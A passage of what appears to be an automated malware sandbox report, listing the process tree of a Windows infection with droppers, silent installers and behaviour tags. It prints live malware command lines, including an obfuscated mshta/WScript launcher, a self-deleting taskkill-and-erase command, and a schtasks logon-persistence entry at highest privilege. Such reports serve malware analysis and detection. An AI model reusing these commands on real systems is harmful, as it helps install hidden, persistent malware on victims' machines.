                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8834709.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8834709.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5988
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6104047.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6104047.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3984
                                                                                                                                                      • C:\Users\Admin\Documents\wXmMuiwJGXtUj5rOoDmdtWMp.exe
                                                                                                                                                        "C:\Users\Admin\Documents\wXmMuiwJGXtUj5rOoDmdtWMp.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5116
                                                                                                                                                          • C:\Users\Admin\Documents\wXmMuiwJGXtUj5rOoDmdtWMp.exe
                                                                                                                                                            "C:\Users\Admin\Documents\wXmMuiwJGXtUj5rOoDmdtWMp.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:8040
                                                                                                                                                        • C:\Users\Admin\Documents\BnQ4aKMNI2WNo_QRQfXfF3sq.exe
                                                                                                                                                          "C:\Users\Admin\Documents\BnQ4aKMNI2WNo_QRQfXfF3sq.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6412
                                                                                                                                                          • C:\Users\Admin\Documents\fyTK_ha9_i9AkLVl43q5iF9Z.exe
                                                                                                                                                            "C:\Users\Admin\Documents\fyTK_ha9_i9AkLVl43q5iF9Z.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6380
                                                                                                                                                              • C:\Users\Admin\Documents\fyTK_ha9_i9AkLVl43q5iF9Z.exe
                                                                                                                                                                "C:\Users\Admin\Documents\fyTK_ha9_i9AkLVl43q5iF9Z.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:7564
                                                                                                                                                              • C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe
                                                                                                                                                                "C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:5964
                                                                                                                                                                • C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4336
                                                                                                                                                                  • C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\YXwFn4OzHtSM5d6LnttJQSVo.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7956
                                                                                                                                                                  • C:\Users\Admin\Documents\yftcPQcYLxaMMT2jKh8nu6N_.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\yftcPQcYLxaMMT2jKh8nu6N_.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:6140
                                                                                                                                                                  • C:\Users\Admin\Documents\8Dhjng7WG6xtndOscqEP1G7O.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\8Dhjng7WG6xtndOscqEP1G7O.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:7124
                                                                                                                                                                    • C:\Users\Admin\Documents\Tn_aka32uVGlAfnJMKSMKkvv.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\Tn_aka32uVGlAfnJMKSMKkvv.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7184
                                                                                                                                                                      • C:\Users\Admin\Documents\8vmhtmZ1ZW8QwRBwUzYUfD8I.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\8vmhtmZ1ZW8QwRBwUzYUfD8I.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        PID:7280
                                                                                                                                                                      • C:\Users\Admin\Documents\ssQ6SEkOYVFv30EJcTy733nd.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\ssQ6SEkOYVFv30EJcTy733nd.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:7240
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "ssQ6SEkOYVFv30EJcTy733nd.exe" /f & erase "C:\Users\Admin\Documents\ssQ6SEkOYVFv30EJcTy733nd.exe" & exit
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:8596
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /im "ssQ6SEkOYVFv30EJcTy733nd.exe" /f
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:8860
                                                                                                                                                                          • C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7368
                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7456
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\ckpM3Zi6bwNKygZ5HJSAcMf8.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:7840
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:2916
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:5600
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:4756
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:1452
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill -IM "ckpM3Zi6bwNKygZ5HJSAcMf8.exe" -f
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:7660
                                                                                                                                                                                    • C:\Users\Admin\Documents\CJzXeQR_cK0cHkFrgcmoTm9m.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\CJzXeQR_cK0cHkFrgcmoTm9m.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      PID:2584
                                                                                                                                                                                    • C:\Users\Admin\Documents\UL8mLeNe2fiqKwMWlZIbePPD.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\UL8mLeNe2fiqKwMWlZIbePPD.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:7428
                                                                                                                                                                                    • C:\Users\Admin\Documents\HNC90mnyagfwAxzFWeWmutpn.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\HNC90mnyagfwAxzFWeWmutpn.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:7620
                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4324
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:7984
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5412
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5997798.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5997798.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4072
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4828615.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4828615.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                              PID:4284
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1426727.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1426727.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4900
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7838834.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7838834.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4240
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4628
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2682858.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2682858.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6160
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5076
                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5232
                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                    schtasks.exe /create /tn "md8_8eus" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\jooyu\md8_8eus.exe'" /rl HIGHEST /f
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    PID:5600
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:5680
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-9ODCT.tmp\MediaBurner2.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-9ODCT.tmp\MediaBurner2.tmp" /SL5="$8007A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5744
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9DT58.tmp\ultradumnibour.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9DT58.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                      PID:3944
                                                                                                                                                                                                      • C:\Program Files\Reference Assemblies\LPXYEYAOUB\ultramediaburner.exe
                                                                                                                                                                                                        "C:\Program Files\Reference Assemblies\LPXYEYAOUB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5484
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9P935.tmp\ultramediaburner.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9P935.tmp\ultramediaburner.tmp" /SL5="$901C8,281924,62464,C:\Program Files\Reference Assemblies\LPXYEYAOUB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            PID:4144
                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:584
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\08-c8dbb-917-a3cb4-7f26dbefdbd03\Doleviwowu.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\08-c8dbb-917-a3cb4-7f26dbefdbd03\Doleviwowu.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            PID:7736
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\c9-69179-9e2-fa19d-db43a124d7901\SHaesaetadecae.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\c9-69179-9e2-fa19d-db43a124d7901\SHaesaetadecae.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:7764
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlb4c324.efb\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:8772
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\hlb4c324.efb\GcleanerEU.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\hlb4c324.efb\GcleanerEU.exe /eufive
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:9096
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i5xhazup.efw\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:9016
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\i5xhazup.efw\installer.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\i5xhazup.efw\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:7988
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spwowmza.uv0\ufgaa.exe & exit
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:6904
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oa1f1znj.jgs\anyname.exe & exit
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:8240
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\oa1f1znj.jgs\anyname.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\oa1f1znj.jgs\anyname.exe
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:8556
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\oa1f1znj.jgs\anyname.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\oa1f1znj.jgs\anyname.exe" -q
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:8868
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvdsbcki.moq\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\rvdsbcki.moq\gcleaner.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\rvdsbcki.moq\gcleaner.exe /mixfive
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:3588
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wgzz2utd.b0w\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:8836
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-UL0Q3.tmp\WEATHER Manager.tmp
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-UL0Q3.tmp\WEATHER Manager.tmp" /SL5="$202E6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                          PID:3996
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-ULBIF.tmp\Setup.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-ULBIF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            PID:6888
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-ULBIF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-ULBIF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629550572 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4668
                                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            PID:8108
                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding EA0D4910615E9B5829ED82155FD93ABA C
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:7916
                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 81A65B69C48A4FBC74744EECDBFD1926 C
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:6180
                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding A2CB68F22575DA66F5254224D13F8F8C
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:8412
                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 9F906181BEA3493DBC9594720222F2F8 C
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              PID:7108
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:8992
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  PID:7628
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                    PID:9080
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7ffcb3f1dec0,0x7ffcb3f1ded0,0x7ffcb3f1dee0
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=1712 /prefetch:8
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                        PID:8992
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:8344
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --mojo-platform-channel-handle=2096 /prefetch:8
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:5432
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,9223319845776663984,8672693183822012090,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9080_1288145247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
